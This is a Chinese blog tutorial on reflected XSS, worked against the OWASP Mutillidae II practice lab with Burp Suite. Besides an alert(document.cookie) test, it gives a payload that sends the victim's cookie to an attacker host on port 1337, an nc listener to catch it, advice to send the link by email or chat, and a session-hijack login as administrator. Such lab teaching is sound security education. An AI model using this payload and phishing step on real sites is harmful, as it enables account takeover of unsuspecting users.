网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍

相关阅读

视频讲解

网络钓鱼通常会通过JavaScript注入恶意payload,如果你在登录的情况下点击,往往会造成cookie泄露,恶意攻击者可以通过cookie直接登录,然后接管你的账号!

图文讲解

以下使用的是OWASP mutillidae II靶场

(其实视频中有一处翻译错误的地方,就是把mutillidae翻译成了multiple days了😊,不过并不影响咯)

我们打开burpsuite,开启拦截(这里显示intercept is on

图片[1]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog

并访问password-generator相关页面,回车

图片[2]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog

点击Send to Repeater

图片[3]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog

之后我们可以对请求进行调整之后自由的发送,点击Send即可,这样在注入时就会方便很多

图片[4]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog

我们可以在响应中看到JavaScript的相关代码

图片[5]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog

我们可以将其复制到编辑器中进行修改,这样看的会清晰些

图片[6]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog

我们添加一段代码尝试获取cookie

图片[7]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog

其实就是截断了之前的JavaScript脚本

;}catch(e){}alert(document.cookie);try{hackerloiisveryhandsome="

我们添加的这个部分放到URL里就可以在输入时进行拼接了

图片[8]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog

我们可以直接在浏览器里粘贴,也可以用repeater发,这个看个人习惯

图片[9]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog

然后回车,有趣的事情就发生了,可以看到cookie通过弹窗的形式显示了

图片[10]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog

其实有很多网友都比较疑惑的就是,有这样的弹窗有什么用呢?如何利用呢?我很多时候扫描器都能扫出来一堆XSS的漏洞,让它弹窗。这里作者给我们分享了一种方式

;}catch(e){}var i=new Image;i.src="http://192.168.0.192:1337/?"+document.cookie;try{hackerloiisveryhandsome="
图片[11]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog

同时需要在攻击者的服务器上监听1337端口

nc -nlvp 1337
图片[12]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog

之后我们需要做的是把链接通过邮件或者聊天软件等方式进行投递,如果网友进行了点击

图片[13]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog

我们就可以在刚才开启1337端口监听的终端里找到cookie了

图片[14]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog

拿到cookie之后,我们使用firefox浏览器的F12开发者工具,找到cookie值,我们可以看到现在是Not Logged in,未登录的状态

图片[15]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog

修改之后回车,可以看到我们现在是管理员身份进行登录的了,这大概就是xss的魅力吧,无需账户密码,通过cookie登录接管账户!

图片[16]-网络钓鱼无需密码也可以登录接管账户?XSS攻击介绍-FancyPig's blog
© 版权声明
THE END
喜欢就支持一下吧
点赞20赞赏 分享
评论 共4条

请登录后发表评论